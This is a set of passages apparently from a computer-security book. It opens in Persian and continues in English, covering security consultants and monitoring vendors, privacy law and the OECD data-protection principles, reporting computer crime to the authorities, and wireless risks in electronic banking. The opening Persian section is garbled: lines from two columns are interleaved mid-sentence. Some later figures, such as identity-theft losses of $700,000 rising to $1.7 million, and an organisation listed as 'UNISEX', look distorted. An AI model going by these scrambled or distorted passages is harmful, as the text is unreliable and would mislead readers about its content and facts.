ﻣﻮﺍﺭﺩ ﺗﻨﻬـﺎ ﭘـﻴﺶﺑﻴﻨﻴﻬـﺎﻱ ﺑـﺪ ﻧﻴـﺴﺘﻨﺪ؛ ﺑﻠﻜـﻪ ﻫﺮﻳـﻚ
ﺑﻴﻤﻪ ﻭ ﺗﻌﻬﺪﻧﺎﻣﻪ
ﺍﺯ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﺭ ﻛﻨﻨﺪ ﺑﭙﺮﺳـﻴﺪ ﻛـﻪ ﺁﻳـﺎ
ﺩﺭﺻــﻮﺭﺕ ﺑــﺮﻭﺯ ﺍﺷــﻜﺎﻝ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘــﺎﻱ ﺷــﻤﺎ ﺭﺍ ﺑــﻪ
ﺑﻴﻤﻪ ﻫﺴﺘﻨﺪ ﻭ ﺗﻌﻬﺪ ﺳﭙﺮﺩﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ .ﺍﻳﻨﻜﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛـﻪ
ﺩﺍﺩﮔﺎﻫﻬﺎ ﻭ ﻣﺤﺎﻛﻢ ﻣﺪﻧﻲ ﺑﺎﺯ ﻛﻨﻨﺪ -ﺑﻪ ﻫـﺮ ﺣـﺎﻝ ﺍﻳـﻦ
ﺷﺮﻛﺖ ﺁﻧﻬﺎ ﺑﻪ ﺷﺎﻳﺴﺘﮕﻲ ﻭ ﺭﻓﺘﺎﺭ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ .ﺍﻳﻨﻜـﺎﺭ
ﺷﻤﺎ ﺑﻮﺩﻩﺍﻳﺪ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﺳﺎﺑﻘﺔ ﺁﻧـﺎﻥ ﺗـﺼﻤﻴﻢ
ﺗﻀﻤﻴﻦ ﻧﻤﻲﻛﻨـﺪ ﻛـﻪ ﺁﻥ ﺳـﺎﺯﻣﺎﻥ ﻭﺍﺟـﺪ ﺷﺎﻳـﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ
ﺑﻪ ﺍﺳﺘﺨﺪﺍﻣﺸﺎﻥ ﮔﺮﻓﺘﻪﺍﻳﺪ.
ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺑﻪ ﻧﻮﻋﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺁﻥ ﺳـﻮﺀ
ﺑﻪ ﻫﻤﻴﻦ ﺻﻮﺭﺕ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﻧﺠـﺎﻡ .۲ ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﻧﺪﺍﺭﻧﺪ.
ﻣﺼﺎﺣﺒﻪ ﺑﺎ ﺷﻤﺎ ﺍﺯ ﺍﺭﺍﺋﻪ ﺍﺳﻢ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ
ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ .ﺷﺎﻳﺪ ﺁﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺩﺭ ﻭﺭﻭﺩ ﺑﻪ ﺑﺪﻧـﺔ ﺭﺍﺑﻄﻪﻫﺎ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺗﻤـﺎﺱ ﺗﻠﻔﻨـﻲ ﺧﺒـﺮﻩ ﺍﺯ ﺍﻓــﺮﺍﺩ ﺑﭙﺮﺳــﻴﺪ ﻛــﻪ ﺩﺭ ﻛــﺪﺍﻡ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺤﻠــﻲ ،ﻣﻠــﻲ ﻭ
ﺑﺎﺷﻨﺪ! ﺍﻣﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺘﺪﺍﺋﻲﺗـﺮﻳﻦ ﺩﻻﻳﻠـﻲ ﻛـﻪ ﻣـﻲﺗـﻮﺍﻥ ﺑـــﻴﻦﺍﻟﻤﻠﻠـــﻲ ) ،IEEE ،CSI ،ASIS ،ACMﻭ (UNISEXﻋـــﻀﻮ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﺳﺎﻣﻲ ﻣﺴﺘﻌﺎﺭ ﺑﺮﺷﻤﺮﺩ ﺍﻳﻦ ﺍﺳـﺖ ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﺍﺭﺗﺒﺎﻁ ﻣﻄﻠﻮﺑﻲ ﺑﺎ ﺁﻧﻬﺎ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ .ﺍﻳﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ
ﻛﻪ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﻗﺒﺎﻝ ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺑﺮ ﻋﻬﺪﻩ ﺑﺮﺍﻱ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﻣﻄﺎﻟـﺐ ﺁﻣﻮﺯﺷـﻲ ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﭘﻴـﺸﺮﻓﺖ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﻳـﻚ ﻧـﺎﻡ ﻣـﺴﺘﻌﺎﺭ ﺑـﺪﻧﺎﻡ ﺷـﺪ ﺑـﺴﻴﺎﺭ ﺗﺨﺼﺼﻲ ﻣﻬﻴﺎ ﻣﻲﺳﺎﺯﻧﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺭﻓﺘـﺎﺭ
ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻋﻮﺽ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﺑﺨﻮﺍﻫـﺪ ﺣﺮﻓﻪﺍﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ .ﺍﮔﺮ ﺳﻮﮊﺓ ﺷﻤﺎ ﺗﻨﻬﺎ ﻣـﺪﻋﻲ
ﻧﺎﻡ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻭ ﻳـﺎ ﺳـﺎﺑﻘﺔ ﺁﻧـﺮﺍ ﺍﺻـﻼﺡ ﺳﺎﺑﻘﺔ ﻋـﻀﻮﻳﺖ ﺩﺭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻣﺜـﻞ " The 133t Hax0r
ﻛﻨﺪ. "Guildﺍﺳﺖ ﺷﺎﻳﺪ ﺑﻬﺘـﺮ ﺑﺎﺷـﺪ ﺟـﺎﻱ ﺩﻳﮕـﺮﻱ ﺑـﺪﻧﺒﺎﻝ ﻳـﻚ
ﻛﺎﺭﺷﻨﺎﺱ ﺍﻣﻨﻴﺖ ﺑﮕﺮﺩﻳﺪ!
3. Finally, many of today's intruders are not all that knowledgeable about security. In both method and manner they behave more like criminals than like computer programmers and architects. It is the poor quality of today's operating systems, the absence of security in planning, and the wide availability of automated intrusion tools that make it so easy to break into and attack computer systems. Just as a person with a record of jumping cars is not necessarily a skilled race-car driver or an expert engine designer, someone who knows how to use intrusion tools and carry out denial-of-service attacks may have fundamental gaps in understanding the security needed to keep systems safe.

Monitoring Services
If your overall situation is stable, using monitoring and control services is a good investment. Services commonly provided on an ongoing basis include on-site administration by contractors, on-site and off-site security monitoring, incident response and forensics (on request), and support of an alternate site for use when the main site fails. But besides being concerned about the people who provide consulting services, you must also be careful about the hardware and software they use.

Many monitoring and incident-response companies have hardware and software that they will want to install on your network. They use it to collect the information needed to review and change the system's security settings. You must treat this technology with caution, because it sits in a privileged position inside your security perimeter:

1. Make sure you receive complete, written descriptions of how the various components of the network and its equipment operate. Also make sure that you understand how those components work and what each of them does.
2. Obtain a written statement about equipment failures from whoever is responsible for the component in question. If hardware or software installed on the system sends your data outside the organization, or unexpectedly brings your systems down during the busiest hours of the day, you should not suddenly discover that, under the agreement you made with the vendor, the vendor bears no liability!
3. Make sure that due care has been taken in developing, testing, and deploying the technology being added to your systems, especially if its design is proprietary. In particular, given the record of quality and security problems in Microsoft's software, we suggest that you exercise due care before using the services of any company that has decided to base its security technology on Microsoft products, because that company must continually fix newly discovered flaws in most of its current products while also keeping those products compatible with earlier versions.
4. Examine carefully whether the company's technology actually helps prevent problems from occurring or only notices them after they have happened.

Final Words on Outside Resources
Using outside experts is a good way to obtain the protection you need. The skills required to write policies, monitor intrusion-detection systems and firewalls, and prepare and carry out a disaster-recovery plan are sometimes highly specialized and uncommon, and may not exist among the organization's current staff. Doing these very tasks correctly is what decides whether a business continues or comes to an end because of various flaws and failures.

At the same time, the field of security consulting is fraught with danger, because it is a new phenomenon and is not well understood. Charlatans,
…government in the networked world. We will see examples of legislation meant to protect citizens, customers, and children from identity theft, fraud, and indecent material. Part Four presents a deeper discussion of the legal issues of cyberspace. In this chapter our emphasis is mainly on organizational responsibility in the public sphere.

Business and Customer Relations in the Digital World
Online merchants obtain a great deal of information about their customers. An online store knows which product you are looking at, which product you add to your shopping cart but remove some time later, and which product you finally buy online. Online merchants also know whether you are at home or at work when you buy and, if they wish, can find out the remaining credit on your payment card as well. In addition, unlike in the offline world, an online merchant can link your purchase history with your web-browsing habits and, by establishing such links among the different data of a wide range of customers, discover a set of valuable behavioral patterns.

ISPs are able to learn even more about their customers, because everything an Internet user sees

…comply with?

In the United States, consumer rights were first explicitly addressed in the Fair Credit Reporting Act (enacted in 1970). This law recognized basic consumer rights: the right of every consumer to see his own credit reports, the right to know who sees the reports about him, the right to require the agencies that prepare the reports to investigate errors discovered by consumers, and the right to require those agencies to add a statement from the consumer to disputed reports. In 1973, at a time when personal data was increasingly being kept on computers, the Code of Fair Information Practices was issued to uphold consumer rights.

Code of Fair Information Practices [118]
The Code of Fair Information Practices rests on five principles:
• There must be no system for keeping records of personal data whose existence is secret.

[118] Source: U.S. Department of Health, Education and Welfare
• There must be a way for a person to find out what personal information about him is recorded and how that information will be used.
• There must be a way for a person to prevent personal information about him from being used for purposes other than those declared to him.
• There must be a way for a person to correct information about him that identifies him.
• Any organization that creates, maintains, uses, or disseminates records of personally identifiable data must assure the reliability of the data for its intended use and must prevent misuse of the data.

The U.S. Congress went on passing laws that regulated the use of personal information. Over time, bank records, telephone records, Internet records, cable-television subscriber records, health records, educational records, and even video-rental records all came under the coverage of U.S. congressional law. Each piece of legislation, however, creates different protections and is enforced by a different part of government. Some offenses, such as those covered by the act on the privacy of telephone and fax subscribers, could not be pursued without a complaint from a private party. In Europe, however, things were different. Drawing on the experience of the Second World War, in which a great deal of personal information was misused by the Nazis, most European governments preferred to use special institutions to regulate the collection and use of personal information. The Europeans generalized the ideas of the Code of Fair Information Practices into an overall regime known as data protection.

Guidelines of the Organisation for Economic Co-operation and Development
In 1980 the Organisation for Economic Co-operation and Development (OECD) adopted and issued a set of privacy guidelines. These guidelines were designed in part to harmonize the growing body of privacy regulation in the industrialized countries. They were designed specifically to address the growing problems of transborder data flows: the movement of personal information from a country where personal data is strongly protected to another country where personal data enjoys less protection. The OECD guidelines on the protection of privacy and transborder flows of data consist of eight principles:

Collection Limitation Principle
There must be limits on the collection of personal data. Any personal data must be obtained by lawful and fair means, under proper circumstances, and with the knowledge and consent of the person to whom the information relates.

Data Quality Principle
Personal data that is collected must be relevant to the purpose declared for its use, or to areas related to that purpose. The data must be kept accurate, complete, and up to date.

Purpose Specification Principle
The purpose of collecting personal information must be specified at the very moment the data is collected, and not later. Subsequent uses of the collected information must be limited to those purposes; if later purposes are not compatible with the original ones, the change of purpose must be stated explicitly, and the person's consent to the use of his information for the new purposes is also required.

Use Limitation Principle
Personal data must not be disclosed, made publicly available, or used for purposes other than those declared, as stated in the preceding principles, except:
o with the consent of the person who owns the information; or
o with legal authorization.

Security Safeguards Principle
Personal data must be protected by appropriate security safeguards against risks such as loss, access, destruction, modification, disclosure, and unauthorized use.

Openness Principle
There must be a general policy of openness about practices and policies with respect to personal data. Means must exist that make it easy to establish the nature of the personal data, the main purpose of its use, and the usual period for which it is kept.

Individual Participation Principle
Everyone must have the right to:
o find out whether or not the data collector holds information about him;
o communicate with the collector of the data relating to him: within a reasonable time, at low cost, in a reasonable manner, and in a form in which the information is clear to him;
o ask for the reason if one of the above requests is refused, and be able to challenge the refusal; and
o dispute the information relating to him and, if the dispute succeeds, have the information erased, corrected, or completed.

Accountability Principle
Every data collector must be accountable for complying with the principles stated above.

The OECD guidelines do not carry the force of law; instead, these eight principles are used as a guide when the laws of each member country are reviewed.

For a simple checklist of information-protection criteria, to be used when collecting information about customers through a website, see Chapter Eleven of this part of the book.
• If you are an executive of a private company, even one that has no shareholders, partner companies, backers, or customers may file a complaint against you, depending on each country's computer-crime laws.

If you work for a company and know that your system is at serious risk, you should as a rule talk with your organization's legal counsel as part of security planning (before a security incident occurs). Organizations adopt different policies depending on whether or not law enforcement becomes involved. By rehearsing your crisis-time actions, you increase the likelihood that the policies will actually be followed when they are needed.

By way of introduction, this section gives an overview of several issues that you too will quite probably face some day:

Filing a Criminal Complaint
In the United States, whenever you believe that someone has broken the law you can take legal action against him, and this process begins with filing a complaint with the official authorities. Permission is then obtained from the prosecutor for an investigation to be carried out on the basis of the claim and, if a crime is found, for charges to be drawn up on that basis.

In some cases, and perhaps most, a criminal investigation will produce no result for you. If the illegal acts are not repeated and the intruder has left no trace, or if your system was attacked from a foreign country, it is very unlikely that you will be able to identify and arrest the intruders. Professional intruders rarely leave a trace.[131]

[131] Of course, very few intruders are really as clever as they think they are.

Filing a complaint does not necessarily lead to prosecution. The relevant prosecutor (at the national, state, or local level) decides on the basis of the law that was broken, the seriousness of the crime, the need for the cooperation of trained investigators, and the type of conviction. Keep in mind that the judicial system is full of all kinds of cases, so a new case is likely to be investigated only if it involves particular crimes or serious threats. For example, an investigation is far more likely in a case in which $200,000 worth of data has been destroyed than in one in which someone repeatedly scans your personal computer by modem.

Information about the investigation may or may not be given to you. You may even be given incorrect information during the investigation: for example, you may be told that no investigation is under way while investigators are hard at work.

An investigation can put you in a precarious position. If unknown persons keep breaking into your system, the authorities may ask you to leave your system open so that investigators can trace the system's connections and gather evidence for arresting the suspect. Unfortunately, if intruders use your system to do damage to other systems, leaving its doors open after it has become clear that the system is being misused can expose you to a third-party lawsuit, because cooperating with law enforcement does not prevent charges from being brought against you. It is therefore better to examine every aspect of the matter thoroughly before accepting such risks.

Contacting the Relevant Authorities
Depending on the kind of legal and criminal system in your country, you may need to take particular steps to contact local or national officials about a computer crime. Some general recommendations follow; naturally, they will be more effective if you apply them in the way appropriate to your own country.
• If possible, it is better to go first to the local or provincial authorities. If the provincial authorities conclude that national agents are better placed
to investigate the matter, they will suggest that you turn to them. Unfortunately, however, some local law-enforcement agencies have no interest in using the help of national officers. This may mean that the security incident affecting you is not properly investigated.
• Local authorities may be more interested in pursuing your complaint, because your problem most probably does not sit alongside thousands of similar cases (as many as there are at the national level). It is therefore more likely that local officials will take your problem seriously, even if it is a very small one.

In other cases they may disregard your information in order to cover up their own lack of knowledge and keep the standing of the law-enforcement agencies from being called into question. It should be noted that in many cases there is a possibility that the victim too has played a part in the criminal activity. An experienced investigator in the real world does not place complete and unquestioning trust in what the victim says, and the same holds for crimes in the cyber world.

If you and your employees are asked to take part in the investigation to help clarify the matter, make sure that this is being done under a court order; otherwise it may look as though you are an overeager victim. It is better to have a neutral person cooperate with the representatives of the police and the agencies enforcing…
…you can use backup systems while your main systems are being inspected and tested.

When you cooperate with law-enforcement agencies in an investigation, the computing community's view of you may turn negative because of the heavy-handedness and ineffectiveness of that investigation. Most computer users hold a negative view of those who enforce the law, and if you are put in that position these feelings attach to you as well. Such judgments can lower your standing in public opinion below what you deserve, and can stand in the way of your cooperation not only with that investigation but with other professional activities too. In addition, after the investigation has ended you may become the target of electronic attacks or other abuse.

This behavior is regrettable, because many investigators are after all careful and professional, and may really need meticulous investigation in order to stop a suspicious activity or a persistent intrusion. Today we can say that this problem has lessened in recent years and that concern about it has decreased compared with the past decade. Over time, and as people become more aware of the damage done by intruders, even those who meant no harm, these negative feelings toward the authorities are expected to fade still further.

Our strong recommendation is that you think carefully and weigh every aspect of the matter when deciding whether to share any security problem in your system with the authorities. In most cases it is best to consider under what circumstances going to the judicial authorities is necessary: when you have really lost something and suffered harm, or when you personally cannot control the situation that has arisen. Sometimes the publicity arising from an incident is more dangerous than the other losses that follow from it.

After you have decided to call on the authorities, avoid stirring up publicity about it. In some cases the involvement of law enforcement can discourage intruders, but in some cases it can also put you at the center of their attention and, as a result, of further attacks. Be aware that your current problem may be part of a wider problem that is developing and spreading, so that if you do not manage it properly it will cause a great deal of harm to you and to others.

We would like to take an optimistic view of this subject. Law-enforcement bodies are in general aware that they need to raise their level in investigating computer crime, and they are usually working to set up training centers, to establish forensic-analysis organizations and facilities, and to employ other tools for conducting effective investigations. In prosecutors' offices (especially in the country's advanced regions) some investigators and prosecutors usually acquire a great deal of experience, and so should try to pass their knowledge on to their other colleagues as well. In recent years the result of this process has been a fundamental improvement in the success of police work and a large number of successful investigations and prosecutions in the field of cybercrime. It is worth noting the countless benefits of reporting computer crimes, not only for yourself but for the whole of society: successful prosecutions can prevent further abuse of your systems and those of others.

The Responsibility to Report Crime
Finally, remember that a crime will be prosecuted only if you have reported it. Otherwise that will not happen, which benefits neither you nor anyone else, and leaves the intruder free to do further damage, to others as well. Remember that what you have encountered may be part of a huge set of computer crimes and acts of sabotage. Without the necessary investigation, one cannot claim to know whether what happened to you was an isolated incident unrelated to other parts of the system or part of a larger attack.

Another problem with failing to report serious computer crimes is that some will wrongly assume that such crimes rarely happen and will therefore consider the likelihood of these problems in their own systems negligible; little emphasis will be placed on budgeting for and training new law-enforcement officers;
little effort will be made to improve existing laws; and society too will pay less attention to matters of this kind. In short, the result will be a computing environment that is more dangerous for all of its participants than it might appear.

Extra Caution…
This section summarizes further suggestions for preventing possible misuse of computers:
• In the source text of computer programs and in data, place the information about your copyright and proprietary ownership at the very beginning of each file. If you have referred explicitly to copyright, be sure to provide for each customer the possibility of filling in a special form in this connection. Doing so can help with a more accurate investigation and with the recovery of damages.
• Make sure that users are fully aware of the do's and don'ts of their activities and responsibilities.
• Inform all users of everything on your network that is monitored (provided that doing so does not violate your policies). This monitoring may include e-mail, keystrokes, and file access. If no warning about the monitoring has been given, even monitoring an attacker's actions may be deemed a violation of privacy laws.
• Make good backups and keep them in a safe place. If these copies have to be compared with one another to establish the truth, you must be able to identify the people who have had access to them. Keeping backups in public areas means that they cannot later be used as evidence.
• When you observe anything suspicious, or any event that calls for the involvement of the judicial authorities, start taking notes. Write down your observations and your actions and the time of each. Make printed copies of log files and traces and attach them to your notes. During inspections and investigations, a written record of what happened can be extremely valuable. Also record the time and subject of every contact with the authorities.
• Try to define in writing the levels of authority of all employees and users, and include in these definitions everything that a person is legally permitted to access (as well as everything he is not). Devise a mechanism for communicating these definitions so that everyone can understand and apply them properly and also understands the restrictions that follow from them.
• Tell your employees explicitly that they are required to return all resources that have been in their possession (such as program source code and manuals) when their employment ends or whenever they are asked to.
• If something has happened that you believe calls for a police investigation, do not let staff carry out investigations on their own initiative. Such efforts may cause some of the evidence to lose its evidentiary value in the official investigation. Investigators may also form a negative view of you if they see you interfering in the investigation.
• Require your employees to sign an agreement covering their responsibilities with respect to sensitive information, computer use, e-mail use, and other computer-related matters that may come up later. Make sure that the policies are explicit and fair, that all employees are aware of them, and that they have signed the agreement. State clearly that all access and access rights end when the term of employment ends, and that any unauthorized access during or after the term of employment will be prosecuted.
Criminal Hazards in Business
If you are an ISP, run a website, or in any way have computer networks at your place of work, you yourself may face prosecution if your machines are misused.

If the judicial authorities conclude that your computers were used by an employee to break into other computers, to transfer and store classified information (trade secrets, child pornography, and so on), or to take part in computer crimes, your computers may be seized under a seizure warrant so that they can be examined. If during the investigation you can prove that the employee's access to your system was limited, the scope of the seizure may be reduced, but part of your machines will still most probably remain impounded for the duration of the official investigation.

Depending on the procedures accepted in each country's legal system, if the local police or national authorities believe that there is evidence of a violation of the law, they ask a judge for authorization to investigate, and the judge issues a search warrant. In recent years a number of investigators and national officials in the United States have, in some states, come to be known for carrying out sweeping and heavy-handed investigations. One reason for this is the law-enforcement agencies' lack of sufficient experience in dealing with computer crime, which, it appears, will improve over time as this and similar work is done.

Extra Caution…
• Equip yourself with network-monitoring and keystroke-monitoring systems. Such software can monitor and record all information sent or received. If you sense that you have been broken into, start monitoring and recording at once and do not wait for a court order, because law enforcement usually cannot authorize you to act as an agent of the law without the court's permission, and obtaining a judge's order granting that permission may take a long time.
• With the help of your lawyer and your insurance company, draw up contingency plans for the tasks, the related investigations, and every related activity that you must carry out when a break-in occurs.
• Identify the law-enforcement officers who are qualified to investigate potential problems; introduce yourself to them and share your concerns with them before an incident happens. If you later run into a problem that requires help from law-enforcement agencies and the police, even a very basic acquaintance with these people can be extremely useful.
• Do not forget to join the societies and organizations that provide ongoing security awareness and training so that people's expertise in this area grows.
…through identity theft, hijacking of system activity, and similar acts, threaten electronic security. This chapter makes clear that although the "volume" of transactions carried out in the environment affects how broad the necessary security measures must be, the mere use of wireless technology can itself expose security weaknesses. The chapter points out several important measures that system administrators (particularly in banks) can take to reduce risks as far as possible, usually without greatly increasing total cost. The measures this chapter proposes for reducing risk also take in, in a sense, the best practices currently available for providing financial services based on wireless technology.

[132] See the World Bank paper by Tom Kellerman entitled "Mobile Risk Management: e-Finance for the Wireless Environment (2002)": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications

Wireless Technology in New Industries and Sectors
The rapid growth in the use of wireless technology in many emerging financial-services markets has taken careful attention to security issues away from the administrators of financial-services systems. Many of the measures recommended in this book relate to layered security in wireless financial-services applications and represent what are recognized today as best practices in electronic security.

This chapter is divided into the following parts: Part A acquaints the reader with the wide range of applications of wireless technology and electronic financial services around the world; Part B introduces the inherent risks of wireless technology; Part C describes the weaknesses of wireless local area networks (WLANs) and the risk-reduction procedures needed to secure them; Part D deals with the evolution of Global System for Mobile Communication (GSM) networks and the vulnerabilities in them; Part E explains in detail the right ways of dealing with the risks of GSM networks; Part F presents best practices for risk management in the provision of payment services; and Part G offers a final summary and an outlook on the future (third generation; 3G).

The aim of this chapter is to present a set of risk-management and security approaches for banks and payment systems. The chapter tries to offer a framework for assessing
security risks that can be applied in the wireless environment.

A. Overview of Electronic Financial Services
Electronic financial services, whether delivered over the Internet or through remote mechanisms, have grown rapidly. Countries and consumers are increasingly being connected to one another. These technologies not only extend the set of countries on the network but also create new ways of delivering financial services. Since the mid-1990s, the banking industry's investments to increase customer satisfaction have concentrated on Internet banking. Electronic financial services have reduced the cost of financial services. Besides saving on the fixed costs of developing and maintaining branches, the Internet has eliminated many extra steps and lowered costs. An ordinary transaction made through a branch or by telephone costs about one U.S. dollar, whereas the same transaction made online costs about $0.02. The low cost of online financial services has made their use widespread. Internet-based services are sometimes as common in emerging markets as those in industrialized ones. Internet banking in Brazil, for example, has spread as it has in the United States. Because most developing countries lack adequate fixed-line infrastructure, most financial institutions have implemented their services on wireless platforms in order to widen access to them. Along with these realities, four technology-related trends have emerged in the industry: outsourcing, open architecture, integrated strategies, and new methods of electronic payment.

Electronic financial services consist of four main parts: electronic funds transfer (EFT), electronic data interchange (EDI), electronic benefits transfer (EBT), and electronic trade confirmation (ETC). EFT is in fact the oldest form of electronic money exchange and has been in use since the early 1960s. On a global scale a very large amount of EFT takes place within and between banks; the U.S. Treasury estimates it at about $2 trillion a day, or $700 trillion a year. A major part of the international banking EFT of the SWIFT network is carried over satellite links. At present roughly half of the world's 200 countries obtain their Internet and large internal-network connectivity through satellite links. Although most of these countries are economically developed, this leads to heavy traffic and a large volume of economic activity, and that is a major concern from the standpoint of security vulnerabilities. By 2005 the share of Internet banking will rise from 8.5% to 50% in industrialized countries and from 1% to 10% in emerging markets. If better connectivity is established in emerging markets, Internet banking transactions may rise to 20% in 2005, which would amount to more than six trillion dollars in online business-to-business (B2B) transactions.

In the wake of the growth of electronic financial services another outlook is also taking shape: the ever-growing use of wireless communications in developed and developing countries. This relatively new medium is quickly becoming the main medium for e-commerce and electronic financial services. The transformation of businesses from paper-based systems to Internet-based platforms has been very deep. As the platform for all kinds of services shifts from landlines to wireless technologies with the possibility of wider access, the negative effects of this phenomenon spread as well.

Mobile devices are today considered the leading edge of the world's technologies. In 1990 there were only eleven million mobile-phone subscribers in the whole world. By 1999, with the spread of wireless technologies, that number had passed five hundred million, and it is now approximately double that. Comparable statistics for developing countries clearly show the leap brought about by the use of mobile devices. Cambodia, having lost its fixed-line network after about 20 years of civil war, was able to re-establish its connections by using wireless technology. Within a year of starting to use wireless technology, the number of subscribers

…has provided for identity theft, the transfer of counterfeit funds, and extortion as well.

B. Risks of Electronic Financial Services in Wireless Networks
Alongside the many benefits of new technology, risks have also arisen, because technology also makes new methods of fraud and theft easier. Identity forgery, remote access, and the printing of high-quality images of securities now exist in the Internet world, and multipurpose tools and platforms make them easier to carry out. With the spread of telephone-based automated teller devices, which make it possible to use money in developing regions, criminals are able to
… organized, intrusion is regarded as a business model. The FBI's computer crime division has stated that most banks pay the ransom for fear of disgrace and of losing customers. Last year's Egghead extortion is a well-known example: intruders attacked a database holding ten thousand credit card numbers and demanded a large sum from the company in return for not publishing them in an Internet chat room. Later, on Christmas Eve, they also deducted a small amount from the balance of each card. The problem therefore goes beyond financial and reputational matters.

One forecast indicates that identity theft incidents in the United States will more than triple, rising from $700,000[148] last year to $1.7 million in 2005, and that the cost to businesses will grow by 30% to pass $8 million in 2005.[149]

Cybercrime has grown markedly. Attacks on servers doubled in 2001 compared with 2000, and about 90% of the companies surveyed had been infected by viruses and Internet worms despite having various antivirus tools.[150] The 2001 CSI/FBI survey on computer crime and security showed that intrusions had caused more than $377 million in losses.[151]

The main reason such incidents are not dealt with properly around the world is the fear that news of them will spread.[152] Financial companies, worried about tarnishing their public image, are afraid to report the damage and losses they suffer, and so prefer to remain vulnerable. If it becomes known that a business has been the target of computer fraud, its customers may lose their trust and no longer want their information stored in its databases. Providers of financial services need to control their systems in a way that guarantees their security. The wireless medium, which is spreading all over the world, is not a secure medium. The remarkable haste with which countries are adapting to wireless technology has created great confusion.

148 This figure only indicates the annual trend in the United States.
149 These results were published in a 2001 report by Celent Communications, which used FTC data.
150 http://www.infosecuritymag.com/articles/october01/images/survey.pdf
151 James Savage, at that time a special agent in the Secret Service's financial crimes division, said: "These figures point to serious problems in critical infrastructure, because they mean that the business community is willing to admit that it has been harmed in this respect." He believes the figures represent only a small part of the real damage done to the US business community. (3 October 2003)
152 Cornelius Tate, a special agent with CERT, describes this tendency to avoid reporting incidents as follows: "I think the financial losses are greater than what is reported. In my experience there are companies that are unwilling to report the losses they suffer from being broken into. In my view we will see a large rise in companies' losses from this kind of damage year after year, because companies have increasingly come to realise that anyone can be the target of an attack, that being the victim of an attack has gradually become accepted, and that news of it no longer destroys public confidence the way it used to."

C. Wireless local area networks

Wireless networks are currently available in three forms: wireless LANs that use the 802.11b protocol; CDMA/TDMA/GSM networks (mobile telephony and PCS) used by wireless phones and PDAs; and high-power microwave systems that telephone companies use to exchange information over long distances. All three are common around the world, but they share one fundamental security weakness: they use radio frequency (RF) to carry information, which can lead to disclosure of the data being transmitted.

Wireless networks have spread explosively. Low cost, ease of installation and always-on connectivity have driven their rapid growth, particularly in financial services institutions. It was in fact assumed that wireless networks would serve the same purpose as traditional networks, only without cables. These networks have spread because they are convenient for users, and they are currently offered in the United States under
the IEEE 802.11 standard and in Europe under the GSM standard. There are important security concerns that must be taken into account when designing wireless networks.

Seven categories of primary security risk are worth noting for wireless networks:[153]

1. Insertion attacks:[154] the intruder tries to inject "data" into your network through an insecure mobile access point.[155]

2. Session hijacking:[156] also known as "man in the middle", this rests on the fact that in wireless telephone systems the phone authenticates itself to the base station, but the base station does not do the same for the phone. A wireless session between the phone and the base station can therefore be hijacked without the phone being able to notice; it is enough to simulate a base station.

3. Jamming: a kind of denial-of-service attack in which the intruder, by scattering data and broadcasting[157] on your network's operating frequency, tries to flood[158] the radio-frequency spectrum of the wireless network.

4. Encryption attacks:[159] wireless networks based on IEEE 802.11 use the WEP[160] algorithm for encryption. The encryption method and the initialization vectors of this standard are very weak and have been broken many times.

5. Traffic interception and monitoring: the approximate range of mobile access points under the 802.11b standard is about 300 feet. This means that anyone with suitable equipment who is within range of the transmitted packets can receive them. Equipment for amplifying the signal and extending this range is also widely available, so the area in which traffic can be captured is large and hard to secure.

6. Mobile node to mobile node communication: mobile nodes (such as laptops and PDAs) can usually communicate with each other directly if file sharing or any other TCP/IP service is enabled on them. This means that any mobile node can transfer a dangerous file or program across your network.

